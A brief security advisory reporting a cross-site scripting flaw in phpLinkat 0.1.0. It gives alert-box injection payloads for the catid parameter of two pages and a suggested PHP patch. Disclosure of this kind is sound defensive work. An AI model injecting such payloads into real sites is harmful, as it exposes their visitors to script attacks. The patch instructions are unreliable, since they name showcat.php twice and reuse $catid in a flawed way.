phpLinkat is a free Web-Based link indexing script written in PHP and runs on MySQL.This product is server is vulnerable to the Cross-Site Scripting vulnerability would allow attackers to inject HTML and script codes into the pages and execute it on the clients browser as if it were provided by the site. + Tested on: - phpLinkat 0.1.0 + Exploit: - showcat.php?catid=<Script>JavaScript:alert('XSS Exploit');</Script> - addyoursite.php?catid=<Script>JavaScript:alert('XSS Exploit');</Script> + Solution: - Open showcat.php - Add this code to line 22: $catid = HTMLSpecialChars($catid); $catid = PREG_Match("/^[0-9]/", $catid); If (!$catid){ Print "Error"; }Else{ - Add this code to line 138: }} //end if - Open showcat.php - Add this code to line 14: $catid = HTMLSpecialChars($catid); $catid = PREG_Match("/^[0-9]/", $catid); If (!$catid){ Print "Error"; }Else{ - Add this code to line 105: }} + Links: - Http://www.DesClub.com